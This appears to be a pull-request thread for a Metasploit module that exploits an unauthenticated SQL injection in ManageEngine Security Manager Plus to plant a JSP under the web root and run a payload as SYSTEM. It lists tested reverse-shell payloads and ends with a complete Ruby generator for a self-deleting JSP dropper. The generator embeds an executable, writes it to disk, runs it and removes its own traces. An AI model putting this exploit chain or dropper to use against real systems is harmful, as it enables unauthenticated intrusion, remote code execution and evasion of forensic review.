Add ManageEngine Security Manager AdvanceSearch Module #953
…ramework into scriptjunkie-migrator
From EDB.
Plus additional fixes
Verified working against current Windows trial installer from ManageEngine running on 2k3. I don't like the design of having TcpServer serve up the payload. If that's the only way to do it, then fine, but I'd much rather see the payload delivered via the same mechanism as the exploit to improve reliability in the presence of firewalls and other pesky network devices.

Done. Tested on Windows;
New Linux target:
```ruby
# Embeds our executable in JSP
#
def generate_jsp_payload
  my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
```
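Review bot: The `0.0.0.0` fallback in `generate_jsp_payload` derives the advertised host from `Rex::Socket.source_address("50.50.50.50")`, which returns the local interface that routes to that arbitrary public address, not necessarily the one the target can reach; if this function is kept, resolve against `datastore['RHOST']` instead so the JSP fetches the payload from an address reachable from the target. As the follow-up comment notes, the lookup is not needed once the executable is embedded in the JSP itself.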
no longer needed
Examples demonstrating how the new cleanup function operates with different payloads:

Using windows/meterpreter/reverse_tcp:
Using windows/shell_reverse_tcp:
Using linux/x86/meterpreter/reverse_tcp:
Using linux/x86/shell_reverse_tcp:
Re-tested the module again after all the above changes. Demo:

Using linux/x86/shell_reverse_tcp (auto-target):
Using linux/x86/meterpreter/reverse_tcp (auto-target):
Using windows/meterpreter/reverse_tcp (auto-target):
Using windows/shell_reverse_tcp:
I'm sorry, egypt... this code review/testing pace just isn't working out. I'm gonna push. Please file a ticket on redmine if you actually find a bug later.
Originally based on xistence's Metasploit PoC from Exploit-DB.
This module exploits a SQL injection found in the ManageEngine Security Manager Plus advanced search page. It sends a malicious SQL query to create a JSP file under the web root directory, and then has it download and execute our malicious executable in the context of SYSTEM. Authentication is not required in order to exploit this vulnerability.
Demo:
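The review above asked for the payload to travel over the same channel as the exploit rather than being fetched from a separate TcpServer, and the later comments refer to a cleanup step. The following is an added example, not the module's or the PR author's code, of how a JSP dropper can carry the executable inline and remove itself after launching it. It is plain Ruby with no Metasploit dependency; `exe_bytes`, `exe_path` and `jsp_name` are assumed to be supplied by the caller (in a module they would come from the generated payload executable and a random file name), and the hex encoding is chosen because it decodes on old JVMs without any base64 helper class.

```ruby
# Added example: build a self-contained JSP dropper. The executable is embedded
# hex-encoded in the page, so the only traffic needed is the request that writes
# the JSP, the request that triggers it, and the payload's own reverse connection.
#
# exe_bytes - raw bytes of the executable to drop (caller-supplied)
# exe_path  - where the JSP should write and run it (caller-supplied)
# jsp_name  - file name of the JSP under the web root, used for self-deletion
def generate_jsp_dropper(exe_bytes, exe_path, jsp_name)
  hex = exe_bytes.unpack('H*').first
  # Forward slashes are accepted by java.io.File on Windows and avoid
  # backslash escaping inside the Java string literal.
  java_path = exe_path.tr('\\', '/')

  <<~JSP
    <%@ page import="java.io.*" %>
    <%
      // Inline executable, hex-encoded at generation time by the Ruby side.
      String hex = "#{hex}";
      byte[] data = new byte[hex.length() / 2];
      for (int i = 0; i < data.length; i++) {
        data[i] = (byte) Integer.parseInt(hex.substring(2 * i, 2 * i + 2), 16);
      }
      File exe = new File("#{java_path}");
      FileOutputStream out = new FileOutputStream(exe);
      out.write(data);
      out.close();
      // Needed for the Linux target; a no-op on Windows (Java 6+).
      exe.setExecutable(true);
      Runtime.getRuntime().exec(exe.getAbsolutePath());
      // Cleanup: remove the dropper itself once the executable has been launched.
      new File(application.getRealPath("/#{jsp_name}")).delete();
    %>
  JSP
end

# Recover the embedded executable from a generated dropper. Useful for checking
# the round trip offline before a module ever touches a target.
def embedded_exe(jsp)
  hex = jsp[/String hex = "([0-9a-f]*)"/, 1]
  [hex].pack('H*')
end

# Constructed sample input: a fake "MZ" header followed by every byte value,
# which exercises the hex round trip on non-printable and high bytes.
SAMPLE_EXE = [0x4d, 0x5a, 0x90, 0x00].pack('C*') + (0..255).to_a.pack('C*')

if __FILE__ == $0
  jsp = generate_jsp_dropper(SAMPLE_EXE, 'C:\\Windows\\Temp\\abc.exe', 'xyz.jsp')
  puts jsp
  puts "round trip ok: #{embedded_exe(jsp) == SAMPLE_EXE}"
end
```

Because every byte of the executable is embedded, the resulting JSP is about twice the size of the binary; the SQL injection that writes it must tolerate a request of that length, which is the trade-off against the out-of-band TcpServer design.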